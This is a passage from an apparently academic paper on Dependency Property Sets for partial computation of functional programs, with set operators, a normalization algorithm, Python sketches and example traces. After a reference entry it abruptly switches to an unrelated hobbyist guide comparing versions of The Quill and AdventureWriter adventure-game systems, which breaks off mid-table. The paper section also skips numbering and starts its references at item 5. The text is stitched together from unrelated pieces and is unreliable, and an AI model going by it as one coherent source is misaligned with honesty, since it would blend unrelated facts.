which become the refined assumptions for normal forms of DPS and DE. Then, all DPS$ are again modified through DPS reduction, using the DPS$ and DE$ obtained by the preceding DPS reduction. Such modification continues until all DPS$ converge, i.e. no DPS$ changes under DPS reduction. Finally, normal forms of DPSs are obtained by an operation called $-elimination, which removes Minimally Sufficient Parameter Sets (MSPSs) containing the symbol "$" from the DPS$s.
The algorithm of the data flow analysis for obtaining DPSs is described bottom-up and in detail in the following sub-sections, i.e. the DPS reduction, the DPS normalization procedure and the algorithm for transforming a source program into a normal DPS form are described in Sections 4.2, 4.3 and 4.4, respectively. Furthermore, the examples of DPS computation described in Section 5 will facilitate an understanding of the algorithm.
4.2 Primitive Operators for the DPS Reduction
In this sub-section, some primitive operators for DPSs are introduced to make it possible to define an algorithm for obtaining DPSs in the following sub-sections.
(1) Primitive set operators
Operators $+$ and $*$ for DPSs provide a union and a Cartesian product for two DPSs, respectively. For example,
$$\{\{x,y\},\{x\}\} + \{\{x,z\},\{z\},\{x\}\} = \{\{x,y\},\{x\},\{x,z\},\{z\}\}$$
and
$$\{\{x,y\},\{x\}\} * \{\{x,z\},\{z\},\{x\}\} = \{\{x,y,z\},\{x,y\},\{x,z\},\{x\}\}.$$
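Assuming DPSs are modeled as sets of frozensets, the two operators can be written directly in Python (this encoding is ours):

```python
def dps_sum(d1, d2):
    # "+" on DPSs: set union of the two collections of MSPSs.
    return d1 | d2

def dps_prod(d1, d2):
    # "*" on DPSs: union of every pair of MSPSs, one from each operand.
    return {m1 | m2 for m1 in d1 for m2 in d2}

# The example from the text:
d1 = {frozenset('xy'), frozenset('x')}
d2 = {frozenset('xz'), frozenset('z'), frozenset('x')}
```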
To facilitate an understanding of a union and a Cartesian product over a sequence of DPSs, operators $\sum$ and $\prod$ are defined as follows.
\[
\sum_{i=1}^{n} \text{DPS}_i = \text{DPS}_1 + \sum_{j=2}^{n} \text{DPS}_j \quad (\text{for } n > 1)
\]
\[
\sum_{i=1}^{1} \text{DPS}_i = \text{DPS}_1 \quad (\text{for } n = 1)
\]
\[
\prod_{i=1}^{n} \text{DPS}_i = \text{DPS}_1 * \prod_{j=2}^{n} \text{DPS}_j \quad (\text{for } n > 1)
\]
\[
\prod_{i=1}^{1} \text{DPS}_i = \text{DPS}_1 \quad (\text{for } n = 1)
\]
(3) DPS reduction operators
In the DPS normalization procedure, DPSs are iteratively reduced by DPS reduction, i.e. parameters in each DPS are replaced with the DPS$s of the parameters in DE$. Since a DPS of a function "f" is a set which contains all MSPSs of "f", the result of DPS reduction is equal to the union of the results obtained by replacing the parameters in each MSPS of the DPS with the DPS$s of those parameters in DE$. Such a replacement is called MSPS reduction. Therefore, using an operator for MSPS reduction, named "reduce-m", an operator for DPS reduction, named "reduce", can be defined as follows:
\[
\text{reduce}(\text{DPS}, \text{DE\$}) = \sum_{\text{MSPS} \in \text{DPS}} \text{reduce-m}(\text{MSPS}, \text{DE\$})
\]
On the other hand, since an MSPS of "f" is a set of minimal parameters with which "f" returns a defined value, the result of MSPS reduction is a Cartesian product of the results which are obtained by replacing each parameter in the MSPS with the DPS$ of the parameter in DE$. Such a replacement is called parameter reduction. Consequently, using an operator for parameter reduction, named "reduce-p", "reduce-m" can be defined as follows.
\[
\text{reduce-m}(\text{MSPS}, \text{DE\$}) = \prod_{\text{parameter} \in \text{MSPS}} \text{reduce-p}(\text{parameter}, \text{DE\$})
\]
When a parameter in an MSPS is "P", the operation reduce-p(P, DE$) is informally defined according to the attribute of "P" as follows.
reduce-p(P, DE$)
= {case
{P is a formal parameter} -> {{P}};
{P is a variable name other than a formal parameter
and there exists no TDPS$ of P in DE$} -> {{P}};
{P is a variable name other than a formal parameter
but there exists a TDPS$ of P, referred to as "T",
in DE$} -> { return DPS$ in "T" };
{P is function-application-form, which refers to
function "f" and there exists no TDPS$ of "f"
in DE$} -> {{P}};
{P is function-application-form with a function
name "f" and parameter-DPS-list (d1 d2 ... dn).
In addition, there exists a TDPS$ of "f",
referred to as "T", in DE$,
where T = (f (x1 x2 ... xn) D$)} ->
{begin
{A list of DPS$ for actual parameters,
named "A$", is obtained by the
following operations.
A$=(a1 a2 ... an) and
ai=reduce(di,DE$) for i=1 to n}
{All formal parameters in DPS$ of "T" are
replaced with "A$", i.e. each xi in D$
is replaced with ai for all i = 1 to n}
end}
}
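Under a set-of-frozensets encoding of DPSs (ours), the three reduction operators can be sketched in Python. This version covers only the variable-name cases of reduce-p; application forms are omitted for brevity:

```python
from functools import reduce as fold

def reduce_p(p, de_flat):
    # Parameter reduction: a name with a TDPS$ recorded in DE$ is
    # replaced by that DPS$; formal parameters and names without a
    # TDPS$ are kept as singleton MSPSs.
    return de_flat.get(p, {frozenset({p})})

def reduce_m(msps, de_flat):
    # MSPS reduction: Cartesian product over the parameter reductions
    # (an MSPS is non-empty by definition, so the fold is safe).
    return fold(lambda a, b: {m1 | m2 for m1 in a for m2 in b},
                [reduce_p(p, de_flat) for p in msps])

def reduce_dps(dps, de_flat):
    # DPS reduction: union over the MSPS reductions.
    out = set()
    for msps in dps:
        out |= reduce_m(msps, de_flat)
    return out

# E.g. a block where the local name "a" is defined by an expression
# whose DPS is {{x,y}}:
de = {'a': {frozenset({'x', 'y'})}}
```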
4.3 Algorithm for the DPS Normalization
It is necessary to replace variable names which are defined in a block expression with their DPSs in order to reduce a DPS to its normal form in the block. An algorithm for such a replacement is trivial if no DPS in a block expression contains function-application-forms. However, it requires rather complicated data flow analysis if function names are mutually referenced by two function definitions in a block expression, or are cyclically referenced among several function definitions in a block expression. In this sub-section, an iterative procedure for reducing DPSs to normal forms in block expressions is provided.
An operation N(ENV) transforms a DE "ENV" into a new DE "NENV" which is in a normal form, i.e. all DPSs in "NENV" contain only formal parameters and free variables in "ENV". Therefore, if "ENV" contains DPSs for all functions defined in a scope, "NENV" contains all of the DPSs which are transformed into normal forms in the scope. The operator N is an iterative procedure which consists of four phases as shown in Fig. 4-2.
```
DE
|<--------------------------------
V
PHASE 1 : Flattening
V
PHASE 2 : DPS Reduction | Not Converge.
V
PHASE 3 : Convergence Check --
| All DPS$ converge.
V
PHASE 4 : $-Elimination
V
Normalized DE
```
Fig. 4-2 DPS Normalization Procedure
Functions of the four phases in the procedure are described as follows.
[Algorithm of DPS Normalization Operator N]
**PHASE 1 -- Initialize Iteration : Flattening --**
All DPSs in the input DE "ENV" are transformed into DPS$s, called the flat form, i.e. all function-application-forms in each DPS are replaced with the symbol "$". In addition, TDPS$s and a DE$ "ENV$" are constructed using the DPS$s. Then, PHASE 2 is activated.
**PHASE 2 -- DPS Reduction --**
Each DPS in "ENV" is reduced using "ENV$", resulting in a TDPS$. The TDPS$s for all DPSs constitute a new DE$ named "NENV$". The reduction proceeds as follows:
1. A TDPS "t" is chosen from "ENV" for the DPS reduction, where the name of "t" and the DPS in "t" are referred to as "n" and "d", respectively.
2. A new DPS$ "nd$" for "n" is obtained by DPS reduction, i.e. nd$ = reduce(d, ENV$).
3. The TDPS$ with the name "n" is chosen from "ENV$" and is referred to as "t$". A DPS$ of "t$", named "d$", is also chosen.
4. "t$" is set to be in the "CONVERGE" status if nd$=d$.
Otherwise, it is set to be in the "TEMPORARY" status.
When all DPSs in "ENV" are reduced, PHASE 3 is activated.
**PHASE 3 -- Check End of Iteration: Convergence Check --**
If all TDPS$s in "NENV$" converge, i.e. if no TDPS$ in "NENV$" is in the "TEMPORARY" status, the iteration is terminated and PHASE 4 is activated. Otherwise, PHASE 2 is activated to further reduce DPSs, using "NENV$" as the new "ENV$".
**PHASE 4 -- $-Elimination --**
An MSPS in each TDPS$ in "NENV$" is eliminated if the MSPS contains the symbol "$". The results of the elimination constitute the normal form of "ENV".
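The four phases can be sketched as a fixpoint loop in Python. The encoding of application forms as (name, argument-DPS-list) tuples is ours, and we start from the "$" assumption used in the Section 5 traces rather than flattening the initial DPSs, so this is a hedged model of the N operator, not a transcription of it:

```python
# A DPS is a set of MSPSs (frozensets); an MSPS element is a parameter
# name (str), the symbol '$', or an application form
# (fname, (arg1_dps, arg2_dps, ...)), each argument DPS being a
# frozenset of frozensets so the form stays hashable.

def prod(dss):
    # Cartesian product "*" over a sequence of DPSs.
    acc = {frozenset()}
    for d in dss:
        acc = {m1 | m2 for m1 in acc for m2 in d}
    return acc

def reduce_p(p, env, flat):
    # Parameter reduction against the current flat environment.
    if isinstance(p, str):
        return {frozenset({p})}
    fname, args = p
    formals = env[fname][0]
    out = set()
    for m in flat[fname]:  # substitute formals with argument DPSs
        out |= prod([reduce_dps(args[formals.index(q)], env, flat)
                     if q in formals else {frozenset({q})}
                     for q in m])
    return out

def reduce_dps(dps, env, flat):
    out = set()
    for msps in dps:
        out |= prod([reduce_p(p, env, flat) for p in msps])
    return out

def normalize(env):
    # env: fname -> (formals, initial DPS with application forms).
    flat = {f: {frozenset({'$'})} for f in env}           # PHASE 1 ('$' start)
    while True:
        new = {f: reduce_dps(d, env, flat)                # PHASE 2
               for f, (_, d) in env.items()}
        if new == flat:                                   # PHASE 3
            break
        flat = new
    return {f: {m for m in d if '$' not in m}             # PHASE 4
            for f, d in flat.items()}

# Program 3 from Section 5.3: f and g call each other with x and y.
ax, ay = frozenset({frozenset({'x'})}), frozenset({frozenset({'y'})})
cf, cg = ('f', (ax, ay)), ('g', (ax, ay))
env3 = {'f': (('x', 'y'), {frozenset({'x', cf}), frozenset({'x', cg})}),
        'g': (('x', 'y'), {frozenset({'x', 'y'}), frozenset({'x', cf})})}
result = normalize(env3)
```

On the mutually recursive Program 3 the loop converges and $-elimination leaves the DPS {{x,y}} for both functions, matching the trace in Section 5.3.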
4.4 Algorithm for Obtaining Normalized DPSs
In this sub-section, an algorithm for obtaining normalized DPSs is described by means of set-operators for DPSs and a DPS normalization operator introduced in the previous sub-sections. According to an attribute of an input expression defined in Valid
syntax [8], an operator, named D, transforms the expression in a program into the normal form of the expression's DPS. The algorithm of the operator D is informally defined as follows.
D(e)
= {case
    {e is a free-variable-name} -> {{e}};
    {e is a local-defined-variable-name}
        -> D(value-definition of e);
    {e is a strict-primitive-function-application}
        -> ∏ D(ei) (for all operand expressions ei in e);
    {e is an if-then-else-fi}
        -> D(predicate-expression) * D(then-part-expression)
         + D(predicate-expression) * D(else-part-expression);
    {e is a value-definition} -> D(defined-expression);
    {e is a function-definition} -> D(defined-function-body);
    {e is a non-primitive-function-application}
        -> {{(function-name D(arg1) D(arg2) ... D(arg-n))}};
    {e is a block-expression} ->
        {begin
         {Transform the return expression of this block-expression
          into a value definition with a unique name.
          Suppose the name is "&r".}
         {Apply the operator D to each variable definition in the
          block, creating a DE "ENV" for the block expression.}
         {Transform "ENV" into its normal form "NENV" by NENV=N(ENV).}
         {Return the DPS in the TDPS with the value-name "&r".}
         end}
  }
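The if-then-else-fi case of D can be written directly; the set-of-frozensets DPS encoding is ours, with '$' standing for a flattened function-application-form:

```python
def d_if(pred_dps, then_dps, else_dps):
    # D for "if-then-else-fi": D(p)*D(then) + D(p)*D(else) -- the
    # predicate is needed on both paths, joined with either branch.
    star = lambda a, b: {m1 | m2 for m1 in a for m2 in b}
    return star(pred_dps, then_dps) | star(pred_dps, else_dps)

# The body of Program 2, "if u=0 then 0 else f(k+1,u-1) fi", with the
# recursive call already flattened to the symbol '$':
body_dps = d_if({frozenset({'u'})}, {frozenset()}, {frozenset({'$'})})
```

The result is the flat form { {u}, {u,$} } of Program 2's initial DPS.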
The algorithm for obtaining normalized DPSs described in this section has been implemented using TAO-Lisp [14] under VAX/VMS. The program consists of about 600 lines, and the execution results of the program for several examples are shown in the next section.
5. Examples of the DPS Computation
This section provides examples of DPS computation using the algorithm presented in Section 4. Examples are ordered in complexity.
5.1 Simple Expressions
The first example is a block expression without function definitions.
[Program 1]
\[
\{ a=x*y; b=x+z; x=g*h; y=x*g; z=r+s; \text{return } a \}
\]
Processed Block ::
\[
\{ a=x*y; b=x+z; x=g*h; y=x*g; z=r+s; \text{return } a \}
\]
Dependency Property Set of the Block ::
\[
\{ g,h \}
\]
Thus, the result of this block expression is defined by the free variables "g" and "h", although "r" and "s" are also free.
5.2 Function Application
[Program 2]
\[
f=^\wedge[[k,u] \text{ if } u=0 \text{ then } 0 \text{ else } f(k+1,u-1) \text{ fi}]
\]
Notice that this program is equivalent to
\[
f=^\wedge[[k,u] \text{ if } u\geq0 \text{ then } 0 \text{ else } w \text{ fi}].
\]
Processed Block ::
\[
\text{if } u=0 \text{ then } 0 \text{ else } f(k+1,u-1) \text{ fi}
\]
Dependency Property Set of the Block ::
\[
\{ \{u\}, \{u,(f \{\{k\}\} \{\{u\}\})\} \}
\]
Initial DPSs of functions in the surrounding block
\[
\text{FUNC } f(k,u) : \text{ Initial DPS } = \{ \{u\}, \{u,(f \{\{k\}\} \{\{u\}\})\} \}
\]
<< Iterative Procedure >>
STEP : 0 TEMPORARY status : {f}
FUNC f(k,u) : DPS = { {u} }
STEP : 1 CONVERGE status : {f}
FUNC f(k,u) : DPS = { {u} }
--- End of Iteration ---
Dependency Property Set of the Block ::
FUNC f(k,u) : DPS = { {u} }
Therefore, the result of "f" in Program 2 is determined by the second parameter only.
5.3 Mutual Recursion
[Program 3]
{ f = ^[[x,y] if x>0 then f(x-1,y+1) else g(x,y) fi];
  g = ^[[x,y] if x==0 then y else f(-x,-y) fi] }
This program is equivalent to
f = ^[[x,y] x+y].
Processed Block ::
if x>0 then f(x-1,y+1) else g(x,y) fi
Dependency Property Set of the Block ::
{ {x,(f {{x}} {{y}})}, {x,(g {{x}} {{y}})} }
Processed Block ::
if x==0 then y else f(-x,-y) fi
Dependency Property Set of the Block ::
{ {x,y}, {x,(f {{x}} {{y}})} }
Initial DPSs of functions in the surrounding block
FUNC f(x,y) : Initial DPS = { {x,(f {{x}} {{y}})},
{x,(g {{x}} {{y}})} }
FUNC g(x,y) : Initial DPS = { {x,y}, {x,(f {{x}} {{y}})} }
Initial DPSs are assumed to be $.
<< Iterative Procedure >>
STEP : 0 TEMPORARY status : {f,g}
FUNC f(x,y) : DPS = { {$,x} }
FUNC g(x,y) : DPS = { {$,x}, {x,y} }
STEP : 1 TEMPORARY status : {f}
FUNC f(x,y) : DPS = { {$,x}, {x,y} }
CONVERGE status : {g}
FUNC g(x,y) : DPS = { {$,x}, {x,y} }
STEP : 2 CONVERGE status : {f,g}
FUNC f(x,y) : DPS = { {$,x}, {x,y} }
FUNC g(x,y) : DPS = { {$,x}, {x,y} }
--- End of Iteration ---
Dependency Property Set of the Block ::
FUNC f(x,y) : DPS = { {x,y} }
FUNC g(x,y) : DPS = { {x,y} }
Program 3 is an example in which the conventional maximal fixed point solution approach [7] yields an incorrect solution. The computation based on this approach is shown.
Initial DPSs are assumed to be null.
<< Iterative Procedure >>
STEP : 0 TEMPORARY status : {f,g}
FUNC f(x,y) : DPS = { {x} }
FUNC g(x,y) : DPS = { {x}, {x,y} }
STEP : 1 TEMPORARY status : {f}
FUNC f(x,y) : DPS = { {x}, {x,y} }
CONVERGE status : {g}
FUNC g(x,y) : DPS = { {x}, {x,y} }
STEP : 2 CONVERGE status : {f,g}
FUNC f(x,y) : DPS = { {x}, {x,y} }
FUNC g(x,y) : DPS = { {x}, {x,y} }
--- End of Iteration ---
Dependency Property Set of the Block ::
FUNC f(x,y) : DPS = { {x}, {x,y} }
FUNC g(x,y) : DPS = { {x}, {x,y} }
Since "x+y" cannot be evaluated without "y", it is incorrect to include a parameter set \{x\} in the DPS of "f".
5.4 Nested Function Applications
[Program 4]
{ f = ^[[k,u] if u==0 then 0 else f(k,f(u,k-1)) fi] }
Processed Block ::
if u==0 then 0 else f(k,f(u,k-1)) fi
Dependency Property Set of the Block ::
{ {u}, {u,(f {{k}} {{(f {{u}} {{k}})}})} }
Initial DPSs of functions in the surrounding block
FUNC f(k,u) : Initial DPS
= { {u}, {u,(f {{k}} {{(f {{u}} {{k}})}})} }
<< Iterative Procedure >>
STEP : 0 TEMPORARY status : \{f\}
FUNC f(k,u) : DPS = \{ \{u\} \}
STEP : 1 TEMPORARY status : \{f\}
FUNC f(k,u) : DPS = \{ \{u\}, \{k,u\} \}
STEP : 2 CONVERGE status : \{f\}
FUNC f(k,u) : DPS = \{ \{u\}, \{k,u\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
FUNC f(k,u) : DPS = \{ \{u\}, \{k,u\} \}
5.5 Nested Block Expressions
[Program 5]
{ f = ^[[x,y]
    { g = ^[[a,b] a+a]; k = g(x,y)+x; return k+x }] }
Processed Block ::
{ g = ^[[a,b] a+a]; k = g(x,y)+x; return k+x }
Processed Block ::
a+a
Dependency Property Set of the Block ::
\{ \{a\} \}
Initial DPSs of functions in the surrounding block
\text{FUNC } g(a,b) : \text{ Initial DPS } = \{ \{a\} \}
<< Iterative Procedure >>
\text{STEP : 0 } \text{ TEMPORARY status : } \{g\}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
\text{STEP : 1 } \text{ CONVERGE status : } \{g\}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
Dependency Property Set of the Block ::
\{ \{x\} \}
Initial DPSs of functions in the surrounding block
\text{FUNC } f(x,y) : \text{ Initial DPS } = \{ \{x\} \}
<< Iterative Procedure >>
\text{STEP : 0 } \text{ TEMPORARY status : } \{f,g\}
\text{FUNC } f(x,y) : \text{ DPS } = \{ \{x\} \}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
\text{STEP : 1 } \text{ CONVERGE status : } \{f,g\}
\text{FUNC } f(x,y) : \text{ DPS } = \{ \{x\} \}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
\[
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\} \} \\
\text{FUNC } g(a,b) : \text{DPS} = \{ \{a\} \}
\]
As shown above, DPSs of nested block expressions are evaluated from the inner to the outer one.
6. Conclusion
This paper has proposed a new partial computation method for functional programming languages, called the projected function method. This method makes it possible to execute general partial computation without the pre-binding capability that is essential to the partial computation of non-strict functions in the conventional method.
This paper has also presented a new concept called Dependency Property Set (DPS). The DPS indicates the dependency relation between function parameters and resultant values. The DPS concept plays an important role in the projected function method. An algorithm for computing DPSs based on the data flow analysis method is also shown.
In spite of its clarity, the most serious problem of functional programming has been computational inefficiency compared with side-effect based programming. Since partial computation enables intensive program optimization and computation sharing in a fully automatic way, significant computation reduction is possible. The computational power required for the projected function method is the same as that of the DCSB model. Therefore, this method, in conjunction with the DCSB model, offers a way to realize highly-parallel and highly-efficient functional programming machines.
Acknowledgements
The authors would like to thank Dr. Noriyoshi Kuroyanagi, Director of the Communication Principles Research Division at Musashino Electrical Laboratory for his constant guidance and encouragement. They also wish to thank the members of the dataflow system research group in the Communication Principles Research Section 2 for their thoughtful discussions and comments.
References
5. Kahn, K. A partial evaluator of Lisp written in a Prolog written in Lisp intended to be applied to the Prolog and itself which in turn is intended to be given to itself together with the Prolog to produce a Prolog compiler, UPMAIL, Dept. Computer Science, Uppsala Univ., (1982)
Background
The Quill was created by Graeme Yeandle in 1983 and was published by Welsh software house Gilsoft. Various support programs were created over the years (e.g. The Illustrator) which added extra features on selected platforms. The Quill was the first in what is sometimes referred to as the "Gilsoft family" of adventure systems which includes the PAW, the SWAN, and DAAD.
Localised versions of The Quill were published by Norace in Norway, Denmark and Sweden, all on one disc/tape.
In the USA, the tool was sold under license as AdventureWriter by the publisher CodeWriter who included their own graphics system for some of the formats. CodeWriter "grey imported" a French language version to Europe.
Gilsoft's Quill was available for ZX Spectrum, Amstrad CPC, Commodore 64, BBC Micro & Acorn Electron, Sinclair QL, and Oric 1/Atmos. An Atari 800/XL version was developed but may not have been released.
CodeWriter's (US & French) version of the system was available for Commodore 64; Atari 800 and XL series computers with 48K; Apple II (II, II+, IIc) / Franklin Ace 1000; and IBM-PC (MS-DOS). The C64 and Apple/Franklin version had support for graphics.
Although The Quill only had a two-word parser, a special four-word version was created by Gilsoft for CRL (its use in a published game has not been confirmed). For hobbyist programmers, support for four-word inputs could be added to Spectrum games by using the third-party The Fix program, marketed by Kelsoft.
In addition to the commercial games produced using the Quill, several games used the system as a prototyping/development tool (such as Dodgy Geezers and Terrormolinos). There were also games released using (often uncredited) heavily modified versions of the Quill such as Rigel's Revenge and The Serf's Tale.
## Purpose of this document
This guide is intended to collect together information about the various versions of the Quill. It is a work-in-progress.
This document is not a replacement for the excellent Quill manual or third-party programming guides, such as Simon Avery & Debby Howard’s book. Familiarity with at least one version of The Quill is presumed.
The document may be of particular use to adventure writers looking to produce a Quilled adventure targeting more than one platform, or those porting their existing games.
## A note on serial numbers
Most releases of the Quill have serial numbers beginning with A.
The serial numbers of non-English versions start with a B.
The Spectrum version of the Quill was released in two distinct versions: Serial A and Serial C.
The early Serial A version of the Spectrum Quill had a basic level of CondActs (compared to the later versions that appeared on other platforms) and other restrictions, such as not being able to customise the system messages. For example, Serial A on the Spectrum did not have the advanced object-related CondActs (AUTOD, AUTOG, AUTOW, AUTOR) or word assignment for items, so authors had to manually code GET/DROP responses for each object.
Version C for the Spectrum was a major upgrade and is highly recommended as the version to use, particularly as it integrates with the other optional support programs.
Version C was available both as an upgrade from Gilsoft, with a supplementary booklet detailing the major changes, and also in an edition with a fully revised manual. A converter program was provided for Spectrum users to convert a serial A database to a serial C one.
## Copyright
The Quill and associated software products are still covered by copyright. If you are producing adventures using the system (particularly if you plan on selling them) then you are encouraged to obtain an official copy of the software or make a donation to Tim Gilberts (https://www.paypal.me/timgilberts).
# The Quill/AdventureWriter – Version Comparison
## Available Memory
<table>
<thead>
<tr>
<th>Platform</th>
<th>Serial</th>
<th>Available Memory*</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>The Quill</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ZX Spectrum+</td>
<td>A03, A06, A08</td>
<td>30553</td>
</tr>
<tr>
<td></td>
<td>C02+, C04+</td>
<td>29831</td>
</tr>
<tr>
<td></td>
<td>C05+</td>
<td>29431</td>
</tr>
<tr>
<td>Amstrad CPC</td>
<td>A00, A01</td>
<td>28283</td>
</tr>
<tr>
<td></td>
<td>A04</td>
<td>27995</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>A06, A06.4WD</td>
<td>31754</td>
</tr>
<tr>
<td></td>
<td>B02 *(Norace)</td>
<td>29769</td>
</tr>
<tr>
<td>BBC / Electron</td>
<td>A00 Tape <em>(on BBC 32K)</em></td>
<td>17493</td>
</tr>
<tr>
<td></td>
<td>A03 Disk <em>(on BBC 32K)</em></td>
<td>21588</td>
</tr>
<tr>
<td></td>
<td><em>(Electron version has 7K less available)</em></td>
<td></td>
</tr>
<tr>
<td>Sinclair QL</td>
<td></td>
<td>27686</td>
</tr>
<tr>
<td>Oric 1 / Atmos</td>
<td>A03</td>
<td>27686</td>
</tr>
<tr>
<td><strong>AdventureWriter</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Atari 800/XL</td>
<td></td>
<td>22923</td>
</tr>
<tr>
<td>Atari (French)</td>
<td>A01F</td>
<td>22923</td>
</tr>
<tr>
<td>Apple II / Franklin</td>
<td>A01</td>
<td>21760</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>A02</td>
<td>31754</td>
</tr>
<tr>
<td>IBM PC</td>
<td></td>
<td>58841 <em>(40 columns)</em></td>
</tr>
<tr>
<td></td>
<td></td>
<td>58065 <em>(80 columns)</em></td>
</tr>
</tbody>
</table>
* Approximate value (for now), with the default database loaded; the value is as shown through the “memory/bytes available” menu option. Deletion of the default location, object & message text would create additional space.
+ without accounting for The Press compression or the extra 6938 (C02) / 7338 (C05) bytes made available when using The Expander.
Note: the BBC version features built-in text compression.
## Screen Resolutions
(Usable screen area)
(Note: work in progress...)
<table>
<thead>
<tr>
<th>Platform</th>
<th>Characters per line</th>
<th>Lines per screen</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>The Quill</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ZX Spectrum</td>
<td>32</td>
<td>22</td>
</tr>
<tr>
<td>Amstrad CPC</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>BBC / Electron</td>
<td>40</td>
<td>25</td>
</tr>
<tr>
<td>Sinclair QL</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Oric 1 / Atmos</td>
<td>38* (variable size)</td>
<td>26</td>
</tr>
<tr>
<td><strong>AdventureWriter</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Atari</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>Atari (French)</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>Apple II / Franklin</td>
<td></td>
<td>23</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>IBM PC</td>
<td>40</td>
<td>24</td>
</tr>
</tbody>
</table>
## Additional Version-Specific Features
(Note: work in progress...)
<table>
<thead>
<tr>
<th>Graphics Support</th>
<th>SPE</th>
<th>CPC</th>
<th>C64</th>
<th>BBC</th>
<th>QL</th>
<th>ORIC</th>
<th>ATARI</th>
<th>APPLE</th>
<th>C64</th>
<th>IBM</th>
</tr>
</thead>
<tbody>
<tr>
<td>Inverse Text</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Flashing Text</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Individually Coloured Text</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Double height text</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>Yes</td>
<td></td>
</tr>
<tr>
<td>Compression</td>
<td>+Press</td>
<td>Yes*</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Ramsave/Ramload</td>
<td>+Patch</td>
<td>Yes</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Four Word Input</td>
<td>+Fix</td>
<td>(4wd)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Customisable System Messages</td>
<td>C only</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes*</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>User’s own machine code</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>Yes</td>
<td></td>
</tr>
</tbody>
</table>
*BBC compression routine acts on lower case letters and spaces for approximately 32% reduction
*In the BBC version the standard bank of messages are used by the system.
See list of CondActs for other version-specific elements.
## The Quill & AdventureWriter - List of CondActs
### Common Conditions
<table>
<thead>
<tr>
<th>CondAct</th>
<th>Parameter</th>
</tr>
</thead>
<tbody>
<tr>
<td>AT</td>
<td>locno.</td>
</tr>
<tr>
<td>NOTAT</td>
<td>locno.</td>
</tr>
<tr>
<td>ATGT</td>
<td>locno.</td>
</tr>
<tr>
<td>ATL</td>
<td>locno.</td>
</tr>
<tr>
<td>PRESENT</td>
<td>objno.</td>
</tr>
<tr>
<td>ABSENT</td>
<td>objno.</td>
</tr>
<tr>
<td>WORN</td>
<td>objno.</td>
</tr>
<tr>
<td>NOTWORN</td>
<td>objno.</td>
</tr>
<tr>
<td>CARRIED</td>
<td>objno.</td>
</tr>
<tr>
<td>NOTCARR</td>
<td>objno.</td>
</tr>
<tr>
<td>CHANCE</td>
<td>percent</td>
</tr>
<tr>
<td>ZERO</td>
<td>flagno.</td>
</tr>
<tr>
<td>NOTZERO</td>
<td>flagno.</td>
</tr>
<tr>
<td>EQ</td>
<td>flagno. value</td>
</tr>
<tr>
<td>GT</td>
<td>flagno. value</td>
</tr>
<tr>
<td>LT</td>
<td>flagno. value</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>CondAct</th>
<th>Parameter</th>
<th>Platform</th>
</tr>
</thead>
<tbody>
<tr>
<td>NOTEQ</td>
<td>flagno.</td>
<td>BBC</td>
</tr>
<tr>
<td>DESTROYED</td>
<td>objno.</td>
<td>BBC</td>
</tr>
<tr>
<td>CREATED</td>
<td>objno.</td>
<td>BBC</td>
</tr>
</tbody>
</table>
### Common Actions
<table>
<tbody>
<tr>
<td>INVEN or INV (BBC)</td>
<td>DESC</td>
</tr>
<tr>
<td>QUIT</td>
<td>END</td>
</tr>
<tr>
<td>DONE</td>
<td>OK</td>
</tr>
<tr>
<td>ANYKEY or KEY (BBC)</td>
<td>SAVE</td>
</tr>
<tr>
<td>LOAD</td>
<td>TURNS</td>
</tr>
<tr>
<td>SCORE</td>
<td>PAUSE value</td>
</tr>
<tr>
<td>MESSAGE mesno.</td>
<td>REMOVE objno.</td>
</tr>
<tr>
<td>GET objno.</td>
<td>WEAR objno.</td>
</tr>
<tr>
<td>DROP objno.</td>
<td>DESTROY objno.</td>
</tr>
<tr>
<td>CREATE objno.</td>
<td>SWAP objno. objno.</td>
</tr>
<tr>
<td>SET flagno.</td>
